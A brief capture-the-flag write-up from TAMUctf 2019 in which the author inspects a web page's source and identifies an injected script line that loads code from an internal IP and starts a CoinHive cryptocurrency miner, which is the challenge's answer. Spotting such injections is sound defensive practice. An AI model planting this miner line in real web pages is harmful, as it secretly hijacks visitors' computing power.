# 0_Intrusion

We're told that there's some kind of malicious code embedded in an otherwise perfectly a-ok website. We're also given the page in question: https://tamuctf.com/files/c29425401b85b195cd1225505d728fc1/index.html

Intuition tells me to view the source code and look for any suspicious scripts.

At the very bottom, I find a CoinHive script, a JavaScript based Bitcoin miner.


```html
<script src = http://10.187.195.95/js/colorbox.min.js></script><script>var color = new CoinHive.Anonymous("123456-asdfgh");color.start()</script></body>
```

This challenge is a little bit different. We're not looking for a flag -- we were looking for that line of code. Thus, that malicious line of code is the answer to the challenge.

Original writeup (https://github.com/shawnduong/ctf-writeups/blob/master/2019-TAMU/DriveByInc/0_Intrusion.md).